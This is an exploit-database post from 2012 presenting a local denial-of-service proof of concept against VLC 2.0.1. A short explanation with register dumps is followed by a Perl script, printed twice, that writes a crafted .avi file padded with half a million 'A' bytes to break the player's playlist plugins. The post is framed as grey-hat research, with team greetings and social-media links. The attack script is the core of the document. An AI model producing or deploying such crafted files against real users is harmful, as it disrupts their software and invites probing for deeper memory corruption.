|
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [x] Official Website: http://www.1337day.com 0
1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1
0 0
1 ========================================== 1
0 I'm Dark-Puzzle From Inj3ct0r TEAM 0
0 1
1 dark-puzzle[at]live[at]fr 0
0 ========================================== 1
1 Pentesting/exploit coding/bug research 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
[0day Exploits] Allah , Alwatan , Almalik .[0day Exploits]
# Exploit Title: VLC 2.0.1 - .avi playlist plugins DoS (Explanation + PoC) .
# Author: Dark-Puzzle .
# Danger : Medium .
# Category :Local Exploit .
# Version: Latest ; 2.0.1 And 2.0.1 Twoflower (Previous versions are not tested but Maybe Vulnerable)
# Vendor : www.videolan.org
# Software Link : http://www.videolan.org/vlc/releases/2.0.1.html (Latest Version)
# Date: 26 June 2012 .
---------------------------------------------------------------------------
Understanding the Exploit :
Executing a .avi file created with the script below causes a DoS of the Playlist Plugins , so the playlist stop running . Clicking to play another media in the playlist or trying to Play/Pause/Stop doesn't work anymore . So The program Should be restarted .
The issue is that the return adress to the plugins files in windows and VLC DLL in the stack (from 01EFF8BC to 01EFF9B8 [in my case] ) are facing a problem when filling ASCII + the hex code in the avi file .
Registers :
EAX 00000000
ECX 00000000
EDX 00000000
EBX 000005FA
ESP 01EFF8BC
EBP 01EFF8C0
ESI 01EFFB40
EDI 01475FF8
EIP 653FCF0F
----------------------------------------
LastErr ERROR_PATH_NOT_FOUND (00000003)
----------------------------------------
playlist plugin DLLs :
libmpc_plugin.dll
libsid_plugin.dll
libxa_plugin.dll ...
----------------------------------------
We can find some return adresses refering to the playlist in the stack after openning the .avi file .
So I've tried to create a file with a lib return adress with some nops and INT3's (not avalaible here) , and I've found that the DoS attack stops the playlist plugins from doing what they should do and making the program lose the playlist plugins paths even after loading them .As a result , you can't neither play any medias while the .avi file is in the playlist , nor play/pause/stop .
----------------------------------------
Exploitation ( PoC ) :
#!/usr/bin/perl
my $h ="\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";
my $d = "\x41" x 500429 ;
my $file = "dark.avi";
open ($File, ">$file");
print $File $h,$d;
close ($File);
-----------------------------------------------------------------------------------------------
Dark-Puzzle (Souhail) .
\x90
Follow me : fb.me/dark.puzzle
\x90
Follow Moroccan Cyber Army : https://www.facebook.com/MAR.Cyber.Army
\x90
Greetz to : M.C.A , Team-Hunter , Jigs@w , All Inj3ct0r team Members , Packetstromsecurity.org , Ar-Devlopers....
\x90
Pentesting is my LIFE .
GREY HAT Mercy From M0rocC0 .
my $h ="\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";
my $d = "\x41" x 500429 ;
my $file = "dark2.avi";
open ($File, ">$file");
print $File $h,$d;
close ($File);
|
推荐
评论(0条)
